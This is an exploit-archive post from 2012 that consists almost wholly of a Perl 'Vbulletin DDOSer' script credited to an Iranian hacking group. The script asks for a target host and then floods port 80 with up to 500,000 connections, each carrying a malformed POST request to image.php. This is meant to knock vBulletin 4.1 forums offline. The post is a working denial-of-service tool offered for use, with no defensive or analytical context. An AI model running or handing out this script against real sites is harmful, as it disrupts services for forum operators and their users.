Vbulletin 4.1.* Remote Denial of Service

2012-07-04 12:13:23
Posted by: irist.ir

#!/usr/bin/perl
# Vbulletin 4.1.* Remote Denial of Service
# Version: 4.0.11
# Home : http://Www.IrIsT.Ir/forum
# Security : High


use IO::Socket;
print "###########################################################################\n";
print "# #\n";
print "# Islamic Republic Of Iran Security Team - Vbulletin DDOSer #\n";
print "# Home : Www.IrIsT.Ir & Www.IrIsT.Ir/forum #\n";
print "# #\n";
print "###########################################################################\n";
print "Vbulletin DDOSer\n";
print "Site : ";
$HOST = <STDIN>;
chop ($HOST);

$i=0;
while($i<500000){
$i++;

$lower=1;
$upper=200000;
$random = int(rand( $upper-$lower+1 ) ) + $lower;
$FILE = "1111111111111111111111111111111111111111111111111111111111111111111111111111";
$LENGTH = length $FILE;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "*";
print $get1 "POST /image.php?type= HTTP/1.1\n";
print $get1 "Host: ".$HOST. "\n";
print $get1 $FILE;
syswrite STDOUT, "*";
}
# Greetz : TBH - Security7.Ir - GreyH4t.Com - Datacoders.org - Shabgard.Org & All IrIsT.Ir & Iranian Security Team

Fixes

No fixes

In order to submit a new fix you need to be registered.